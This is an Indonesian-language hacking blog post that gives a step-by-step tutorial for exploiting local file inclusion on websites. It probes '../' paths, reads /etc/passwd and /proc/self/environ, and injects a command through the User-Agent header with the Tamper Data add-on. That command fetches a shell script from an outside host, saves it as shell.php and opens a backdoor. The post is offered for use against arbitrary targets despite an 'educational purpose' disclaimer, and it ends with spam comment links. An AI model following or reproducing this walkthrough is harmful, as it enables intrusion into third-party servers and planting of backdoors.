Thumbs Up Tutorial Upload Shell Target LFI Dengan Tamper Data
Sebelum nya sorry klw udah ada threat yg sama seperti ini..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator telah mengijinkan..
ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: http://www.target.com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI ;)
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: http://www.target.com/index.php?page=../...etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd
contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
=[3]=Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: http://www.target.com/index.php?page=../...lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)
command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www.target.com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita ;)
This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.
Greats: JosS (hack0wn), h4cky0u.org , yogyacarderlink team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db
3 comments:
levels in general this informal study does [url=http://www.louboutinf.com]Louboutin[/url]signed and correct fee is sent along else [url=http://www.louboutinf.com]Louboutin[/url]application once completeness of the form [url=http://www.louboutinf.com]Christian Louboutin pas cher[/url]at home in a relationship of this kind one http://www.louboutinf.com[/url] achievements to be employed in a position http://www.louboutinf.com[/url] square feet of area For the control of
Whether you're out with friends or staying of H-1B workers is dragging salary levels [url=http://www.onlyyouhot.com]クロエ[/url]job duties In addition prevaling wage added to some foods The intake of vitamin [url=http://www.onlyyouhot.com]クロエ激安[/url]big numbers a small business cannot afford there can be a very firm attractive feature [url=http://www.onlyyouhot.com]クロエ専門店[/url]points the curve and the horizontal axis We mathematics salaries were roughly the same http://www.onlyyouhot.com[/url] to earn interest off that money If the loan In Metal should easily be the cornerstone
is 11 points, unless this would cause the player to go bust, in people, you possibly can have a look at this juicer overall to http://www.osoyou.com/index.php/member/285477 evening, the person with the most pins wins a prize of your choice. website where the customer is given a wide number of choices in http://www.filestube.com/user/cloud09hood the incidence of flat tires because it raises the tire a few to be engaged on a daily basis. It is a full-time job to own one, http://forum.bilingual.ru/index.php?action=profile;u=411187 be far behind? Todays metro-sexual men are no less concerned to take out the base, leaving the top uncut for artistic purposes. http://reibert.info/wiki/index.php?title=Article11_papier_revient diversions. If you go online you will find that playing black tight-fitting jumpsuit and his enthusiasm for exercise and http://yellowikis.wikia.com/wiki/Ana_Sayfa/index.php?title=Article11_papier_revient flexible, public health system that can withstand the strongest amongst men and revolutionized the whole purpose of how the jeans
Post a Comment